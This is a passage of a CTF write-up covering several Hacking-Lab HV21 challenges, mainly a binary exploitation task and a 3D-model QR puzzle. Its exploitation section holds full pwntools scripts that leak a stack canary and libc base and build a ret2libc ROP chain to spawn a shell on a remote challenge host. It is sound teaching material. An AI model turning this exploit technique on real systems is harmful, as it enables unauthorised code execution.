class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))<\/pre>\n\n\n\n<p> <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"537\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1024x537.png\" alt=\"\" class=\"wp-image-1794\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1024x537.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-300x157.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-768x403.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1536x806.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61.png 1720w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>In this case the stack canary is directly after my input &#8220;AAA&#8230;&#8221; (&#8230; 0x41 0x41 0x0a): <strong>0x008d57aeea482121<\/strong>. Now we read this dynamically and put it back in place:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*200+canary+b'B'*300)\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()<\/pre>\n\n\n\n<p>We can see that we can trigger the overflow and no smash detection happens anymore:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"861\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-1024x861.png\" alt=\"\" class=\"wp-image-1795\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-1024x861.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-300x252.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-768x645.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62.png 1428w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The next step is about finding the right spot for the payload. With &#8220;pattern_create&#8221; and &#8220;pattern_offset&#8221; we can figure this out.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ pattern_create.rb -l 800\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\nimport os\ncorefile = \"core.hv21_santas_wis\"\nif os.path.exists(corefile):\n\tos.remove(corefile)\n#p = gdb.debug('.\/hv21_santas_wish_service', 'c')\np = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*200+canary+b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba')\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()\n#debug directly with pwntools\n#sudo bash -c 'echo core.%e > \/proc\/sys\/kernel\/core_pattern'\ncore = Coredump(corefile)\nprint(\"RIP: \" + str(hex(core.rip)))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"463\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1024x463.png\" alt=\"\" class=\"wp-image-1796\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1024x463.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-300x136.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-768x347.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1536x695.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63.png 1658w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We now know the offset, which is 8!<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 2 &#8211; Find libc base-address<\/h3>\n\n\n\n<p>Before actually doing step 2, I tried to disable ASLR locally and generate a payload to get a local shell. This didn&#8217;t work, because of the PIE security implementation. PIE randomizes internal application memory addresses and therefore the ROP gadgets which I found with ropper don&#8217;t work. After some time I found out, that circumvention of PIE is not necessary at all. With the memory leak we can directly leak the libc base address of the system and generate a ROP chain directly to libc. Combining all this, we are able to generate our final payload.<\/p>\n\n\n\n<p>At the offset +8, which we determined before, we find the return address of the main function of the provided ELF binary. This return address references back to the libc and therefore we can leak the libc-base-address of the running system! <\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/refspecs.linuxbase.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/baselib---libc-start-main-.html\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/refspecs.linuxbase.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/baselib&#8212;libc-start-main-.html<\/a><\/li>\n<\/ul>\n\n\n\n<p>We disassemble the __libc_start_main function and we find the right offset at +243. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"847\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-847x1024.png\" alt=\"\" class=\"wp-image-1797\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-847x1024.png 847w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-248x300.png 248w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-768x928.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-1271x1536.png 1271w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64.png 1526w\" sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><\/figure>\n\n\n\n<p>Note, that the correct libc address always ends with 0x00. I modified the Python script to calculate the libc base address:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\n#get libc address (+8bytes after canary)\nlibc_memory_leak = memory_dump[262:270]\nlibc_base_int = int.from_bytes(libc_memory_leak, byteorder=\"little\")\nlibc_base_int = libc_base_int - 243 - libc.sym[\"__libc_start_main\"]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\nprint(\"[--> Found Libc Memory Leak: \" + str(hex(libc_base_int)))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"699\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-1024x699.png\" alt=\"\" class=\"wp-image-1798\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-1024x699.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-300x205.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-768x524.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65.png 1394w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The libc base address was found at 0x799eff7a000. <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 3 &#8211; Create ROP chain<\/h3>\n\n\n\n<p>Main tutorial used: <a href=\"https:\/\/stacklikemind.io\/ret2libc-aslr\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stacklikemind.io\/ret2libc-aslr<\/a><\/p>\n\n\n\n<p>As we already have a way to calculate the libc base address, we can search for ROP gadgets directly in the libc library. Take care to use the correct libc library, depending if you are running the exploit against the remote or local target! <\/p>\n\n\n\n<p>Our final payload must look like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">junk \"A\" * 200 | canary | junk \"B\" * 8 | pop rdi ret gadget | ptr to \"\/bin\/bash\" | ptr to system <\/pre>\n\n\n\n<p>We use ropper to find a suitable gadget:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"237\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-1024x237.png\" alt=\"\" class=\"wp-image-1799\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-1024x237.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-300x70.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-768x178.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66.png 1070w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>&#8220;pop rdi; ret&#8221; is just perfect &#8211; we use this one. As the address found in ropper is just an offset, we of course have to add the libc base address to it. The pointer to \/bin\/bash and the system can be easily created with pwntools:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rop.raw(0x0000000000026b72+libc_base_int) # pop_rdi address\nrop.raw(next(libc.search(b'\/bin\/sh'))) # target libc\nrop.raw(libc.symbols['system'])<\/pre>\n\n\n\n<p>Technically, now we should have everything to finalize our exploit. Unfortunately, the exploit didn&#8217;t spawn a shell on the remote system yet. GDB presented me the error message &#8220;148 ..\/sysdeps\/posix\/system.c: No such file or directory.&#8221;. After reading further in the mentioned blog post I did learn that this is happening in an Ubuntu environment. I need to add 8 more bytes for stack alignment. Therefore, the final payload looks like this: <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">junk \"A\" * 200 | canary | junk \"B\" * 8 | pop rdi ret gadget | ptr to \"\/bin\/bash\" | 8 bytes stackalignment | ptr to system <\/pre>\n\n\n\n<p>With this change, the exploit works perfectly! I also used the ROP() function of pwntools which makes the whole process a little bit easier. There is the final exploit code:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/python3\n#\n# Help-files:\n# https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\n# https:\/\/stacklikemind.io\/ret2libc-aslr --> UBUNTU PART!!\n# https:\/\/mdanilor.github.io\/posts\/memory-protections\/\n#\nfrom pwn import *\nfrom struct import pack\n#p = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\np = remote(\"152.96.7.2\", 1337)\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nrop = ROP(binary)\nlibc = ELF('.\/libc.so.6')\n#libc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary &amp; libc_base address\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nlibc_memory_leak = memory_dump[262:270]\nlibc_base_int = int.from_bytes(libc_memory_leak, byteorder=\"little\")\nlibc_base_int -= 0x270b3\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\nprint(\"[--> Found Libc Memory Leak: \" + str(hex(libc_base_int)))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\nlibc.address = libc_base_int\nrop.raw(b'A'*200)\nrop.raw(canary)\nrop.raw(b'B'*8)\nrop.raw(0x0000000000026b72+libc_base_int) # pop_rdi address\nrop.raw(next(libc.search(b'\/bin\/sh'))) # target libc\nrop.raw(0x00000000000c0533+libc_base_int) # stackalignment\nrop.raw(libc.symbols['system'])\np.sendline(rop.chain())\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"893\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-1024x893.png\" alt=\"\" class=\"wp-image-1800\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-1024x893.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-300x262.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-768x670.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67.png 1516w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{0h_n0!!!_3lv3s_Pr0gr4mmingSk1llz_4r3_st1ll_b4d!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.15] Christmas Bauble<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"120\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28.png\" alt=\"\" class=\"wp-image-1729\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28-300x44.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28-768x112.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>.&nbsp;<em>DrSchottky<\/em>&nbsp;graciously provided the surroundings. Such great artists!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have started taking 3D modeling classes and have presented Santa with&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/bauble.stl\" target=\"_blank\" rel=\"noreferrer noopener\">a gift<\/a>. What a nice gesture! But the ball feels heavier than it should; what does that even mean for digital assets???<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>There may or may not be a flag hidden somewhere. Who am I kidding, of course there is. Find it!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge was pretty easy in comparison to the binary exploitation on the day before. I used the online tool <a rel=\"noreferrer noopener\" href=\"https:\/\/app.vectary.com\/\" target=\"_blank\">https:\/\/app.vectary.com\/<\/a> to solve this challenge. I opened the file and changed the display method to wired. This way you can verify that there is a QR code inside the bauble, which unfortunately is not readable yet:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"859\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-859x1024.png\" alt=\"\" class=\"wp-image-1805\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-859x1024.png 859w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-252x300.png 252w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-768x916.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1.png 1236w\" sizes=\"auto, (max-width: 859px) 100vw, 859px\" \/><\/figure>\n\n\n\n<p>I changed the display method to &#8220;shaded&#8221;, right clicked on the bauble and selected &#8220;break apart&#8221;. On the left side in the menu I selected the different parts of the bauble until I found the outer part, which I did hide in the view. Now we already have a pretty clear QR code visible, although still not scannable.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"468\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1024x468.png\" alt=\"\" class=\"wp-image-1806\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1024x468.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-300x137.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-768x351.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1536x702.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-2048x936.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>As a final step I did change the color to all black and got 3 different QR codes from the different orientations:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"560\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1.png\" alt=\"\" class=\"wp-image-1807\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1.png 720w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1-300x233.png 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"708\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2.png\" alt=\"\" class=\"wp-image-1808\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2.png 900w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2-300x236.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2-768x604.png 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"576\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3.png\" alt=\"\" class=\"wp-image-1809\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3.png 690w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3-300x250.png 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{1st_P4rt_0f_th3_fl4g_with_the_2nd_P4rt_c0mb1ned_w17h_th4t}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21-Hidden] Where did you find that??<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"110\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29.png\" alt=\"\" class=\"wp-image-1730\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29-768x104.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<p>What? You found another one? Lucky you!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>In the wired view of the same online application as before I found the flag hidden in the top left corner of one of the QR codes. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"488\" height=\"354\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden.png\" alt=\"\" class=\"wp-image-1810\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden.png 488w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden-300x218.png 300w\" sizes=\"auto, (max-width: 488px) 100vw, 488px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{hidd3n_1n_th3_cube}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.16] Santa&#8217;s Crypto Vault<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"820\" height=\"114\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30.png\" alt=\"\" class=\"wp-image-1731\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30.png 820w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30-768x107.png 768w\" sizes=\"auto, (max-width: 820px) 100vw, 820px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>MtHonegg<\/em>.&nbsp;<em>Kotlin<\/em>&nbsp;rulez \ud83d\ude09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>With the recent Crypto Rally, Santa has invested all his funds into Santa Coins. Because he doesn&#8217;t trust any existing software to securely store his wallet, he asked one of his elves, &#8220;Mikitaka Hazekura&#8221;, to implement their own crypto vault using enterprise software design patterns, the latest technology and thorough unit tests. They&#8217;re so proud of it, they&#8217;ve decided to&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/95cd312c-cf84-4985-9fa3-da70985e39ed.zip\" target=\"_blank\" rel=\"noreferrer noopener\">open source it<\/a>!<\/p>\n\n\n\n<p>Santa requested to use multiple words, based off his favorite anime, instead of one long password to make it more memorable and secure at the same time.<\/p>\n\n\n\n<h2 